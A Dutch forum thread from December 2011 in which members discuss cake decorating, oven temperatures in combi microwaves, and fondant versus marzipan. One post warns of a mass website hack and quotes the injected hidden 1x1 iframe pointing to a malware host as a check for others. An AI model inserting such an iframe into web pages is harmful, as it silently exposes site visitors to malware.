Taarten decoreren XIX

Moderators: Polly, Muiz, NadjaNadja, Telpeva, Essie73, ynskek, Ladybird

Toevoegen aan eigen berichten
 
 
ikkebenmar

Berichten: 876
Geregistreerd: 20-01-04
Woonplaats: een heel klein dorpje

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 11:06

leuke "capcake" ;)

MamaMiesje

Berichten: 18106
Geregistreerd: 21-04-04

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 11:10

_O-

Polivy

Berichten: 11541
Geregistreerd: 10-10-03

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 18:48

Leuk allebei!

Ik zat ook al te kijken van: 'Huh? Voor een vrouw?' :D

Anoniem

Link naar dit bericht Geplaatst: 10-12-11 20:17

Dames, wie heeft er ervaring met bakken in een combimagnetron.. Ik heb dit beslag gemaakt en die zag er stukken beter uit dan mijn vorige pogingen, deze was mooi luchtig toen ie de oven inging.. http://www.deleukstetaarten.nl/recept/2/Basisbiscuit/
Ik heb hem erin gezet met 140 graden en toen ingesteld dat ik naar 180 ging (volgende stand is 200 :+ ) Maar halverwege begint het al branderig te ruiken en wordt de bovenkant al behoorlijk donker :( Uiteindelijk is de bovenkant zwart en is ie binnenin nog niet gaar.. Iemand enig idee hoe ik die temperatuuropbouw het beste kan doen? Nu gaat het blijkbaar te hard..

MamaMiesje

Berichten: 18106
Geregistreerd: 21-04-04

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 20:19

Ik denk dat het aan de kwaliteit van je combi ligt.
Die van ons is ook een combi, maar ik heb nergens moeilijkheden mee qua bakken.
Hoe lang heb je het biscuit erin gehad?

Dorus

Berichten: 13655
Geregistreerd: 06-04-04

Link naar dit bericht Geplaatst: 10-12-11 20:22

Ik werk ook altijd met een combi, maar die van mij is traploos in te stellen. Ik begin op 150 en bouw op naar 170/180 (het zit zo kort op elkaar dus is altijd een beetje gokken :+) met de heteluchtstand. Nooit geen problemen mee.

MamaMiesje

Berichten: 18106
Geregistreerd: 21-04-04

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 20:24

Die van mij gaat van <160 -180 - 190 - 200 - 220 En meestal begin ik een kwartiertje op 160 en daarna de rest van de baktijd op 180.

Anoniem

Link naar dit bericht Geplaatst: 10-12-11 20:25

Ik heb hem er nu 3 kwartier in gehad en dan dus vrij snel op 180.. Is het dan beter om te beginnen op 140 (15 minuten?), dan 160 (ook 15 minuten?) en dan 180 tot gaar? Of duurt het dan te lang dat ie gaar wordt..

MamaMiesje

Berichten: 18106
Geregistreerd: 21-04-04

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 20:29

Hoe groot was je vorm dan? Want drie kwartier is best lang.

MamaMiesje

Berichten: 18106
Geregistreerd: 21-04-04

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 20:32

De cap heeft de val van het paard niet overleefd:
Afbeelding
:D

Anoniem

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 21:13

24 cm.. In het recept staat 45 min, das dus te lang?

Leuke cap! :D

mememe
Berichten: 1766
Geregistreerd: 20-11-05
Woonplaats: Ureterp

Link naar dit bericht Geplaatst: 10-12-11 21:52

Wat een super leuk topic met ontzettend veel mooie en vooral lekkere taarten.
Nou had ik al eerder een taart gemaakt maar nu wil ik heel graag een dubbele met vulling maken.
Maarrrr,, de laatste keer heb ik hem bekleed met fondant en dat viel niet in de smaak jammer genoeg. Hij was groen met een rode rand en rode bloemetjes, het leek heel mooi. Jammer genoeg vonden ze de fondant niet lekker maar de rest van de taart wel ;).

Nou vroeg ik me af wat ik dan kan gebruiken om de taart te bekleden ik had hem al afgesmeerd met botercremé. Nu ben ik heel benieuwd of het er nou aan ligt dat mijn fondant toch nog te dik was en dat hij eigenlijk dunner moet. Of is er iets anders waar ik mee kan bekleden?? Want marsepein moet heel erg hetzelfde zijn qua smaak enzo. Al vond ik dat wel lekkerder.
Heb laatst op stage met verstandelijke en lichamelijke beperkten cupcakes versierd en dus ook met marsepein.
Zou dit nog een optie zijn???


Alvast heel erg bedankt.
Ooowh trouwens ik had al op verschillende sites gekeken, de op gelezen en op google gezocht. Maar kon niet vinden wat ik zocht.

IngridB
Berichten: 2376
Geregistreerd: 08-03-09
Woonplaats: Terheijden

Link naar dit bericht Geplaatst: 10-12-11 21:57

Marsepein is toch heel anders dan fondant hoor :j . Sommigem mensen vinden fondant vreselijk, maar marsepein heerlijk.
Je kunt dus best de taart met marsepein bekleden.
Misschien had je het inderdaad te dik gelaten met uitrollen en dat ze het daarom niet lekker vonden.

xNK

Berichten: 3037
Geregistreerd: 28-08-11

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 10-12-11 22:09

Marsepein breekt sneller toch?

Ik heb liever fondant, smaakt voor mij zelf lekkerder, maar over het algemeen ben ik helemaal geen fan van taarten en cupcake's en de bekleding, als het maar snoep is :=, vind alleen het maken zo leuk!

Kinke

Berichten: 21159
Geregistreerd: 20-02-04
Woonplaats: Overijssel

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst door de TopicStarter : 10-12-11 23:25

Arme cap MM :)
Ik bak ook in een combi (met hetelucht), gewoon constant op 160 graden, nooit problemen mee :)

Anoniem

Link naar dit bericht Geplaatst: 10-12-11 23:58

Ik werd er zojuist op gewezen door iemand, dat o.a. mijn eigen website gehackt is.

Na wat google werk schijnt dat er vandaag duizenden Nederlandse websites hierdoor getroffen zijn.
Er is in de meeste gevallen in het index bestand een extra iframe toegevoegd.

Dat kan er zo uit zien (uit mijn eigen brontekst):
<iframe src="http://seawolbeamasa.com/main.php?page=887c73c59dbbfc05" width="1" height="1" frameborder="0">

Bevat een virus!

Dus een tip aan allen, en vooral de Joomla en Wordpress gebruikers (die schijnen vooral getroffen te zijn), om je website even goed te controleren hierop!

Rinske

Berichten: 25110
Geregistreerd: 16-04-02
Woonplaats: Loon op Zand

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 11-12-11 02:16

Marsepein is heel anders qua smaak als fondant, omdat marsepein van amandelen is gemaakt en ook echt die smaak heeft. Fondant smaakt gewoon naar suiker (en het verschilt ook nog van merk tot merk wat voor smaak ze hebben).
Je moet ongeveer tot 3-3,5mm uitrollen, dat is ideaal om mee te bekleden vind ik. Dunner wordt te breekbaar en doorzichtig, dikker wordt te dik en overheersend qua smaak.

MamaMiesje

Berichten: 18106
Geregistreerd: 21-04-04

Link naar dit bericht Geplaatst: 11-12-11 09:51

Ik ben chocolademousse met marshmallows aan het maken, maar dan met witte chocola. Het ziet en smaakt nú al veelbelovend :9

edit: en zoeoeoett :')
Maar goed dat ik het ga combineren met citroenbavarois :=

TinkerTom

Berichten: 4032
Geregistreerd: 08-07-06
Woonplaats: Fijnaart

Link naar dit bericht Geplaatst: 11-12-11 10:14

en dat op de vroege zondagmorgen?? :oo ik ben een zoete kauw maar dit is me wat te vroeg _O- _O- :')

MamaMiesje

Berichten: 18106
Geregistreerd: 21-04-04

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 11-12-11 10:16

Ja zeg, ik sta die kom niet leeg te lepelen hoor :P

TinkerTom

Berichten: 4032
Geregistreerd: 08-07-06
Woonplaats: Fijnaart

Link naar dit bericht Geplaatst: 11-12-11 10:21

dat zeg jij...maar dat zien we natuurlijk niet :+

mememe
Berichten: 1766
Geregistreerd: 20-11-05
Woonplaats: Ureterp

Link naar dit bericht Geplaatst: 11-12-11 10:25

@IngridB... ik ga het idd maar eens met marsepein proberen, weet je ook waar ik het kan halen?? Hebben ze het in de gewone supermarkt??

@Rinske.. Dankjewel. Ik ga eerst marsepein maar eens proberen denk ik. Als ik het niet kan vinden dan moet ik idd de fondant nog dunner uitrollen, misschien dat ze het dan wel lekker vinden ;)

@MamaMiesje.. klinkt goed zeg :D... En zo vroeg is het niet hoor :P.. Maarja ik ben geen uitslaper dus ik vind niks meer vroeg :.. In plaats van brood als ontbijt,, lepel je die kom leeg .. zie het al helemaal voor me O:)

@Femke.. wat vervelend dat je website is gehackt. Inmiddels al opgelost of weet je al hoe je het op moet lossen??

Zoowh ik zal snel ontbijten en dan waar naar de dravers om te werken :D.. Jajaah zelfs op zondag,, heerlijk :P

MamaMiesje

Berichten: 18106
Geregistreerd: 21-04-04

Link naar dit bericht Geplaatst: 11-12-11 10:25

:P


Wie van jullie heeft al de SatinlIce fondat uit de emmer(tjes) gebruikt? Hoe beviel dat qua bekleden en hardt het goed uit als je het gebruikt om te boetseren?

IngridB
Berichten: 2376
Geregistreerd: 08-03-09
Woonplaats: Terheijden

Link naar dit bericht Geplaatst: 11-12-11 10:39

@mememe, marsepein kun je oa bij de shop krijgen (DLT) of Jamin, makro, xenos en nog op veel meer plaatsen :j

Rinske

Berichten: 25110
Geregistreerd: 16-04-02
Woonplaats: Loon op Zand

Re: Taarten decoreren XIX

Link naar dit bericht Geplaatst: 11-12-11 11:12

Ik heb nog geen Satin Ice gebruikt, heb wel 1 kilo emmertjes staan voor de verkoop, maar moet eerst mijn 5 kilo emmers Bakels opmaken :-P . Vorige keer zat er 1,5 maand levertijd op Satin Ice, dat vind ik echt wel heel lang!

Mememe bij de jamin kun je wel marsepein kopen, sommige supermarkten hebben het ook.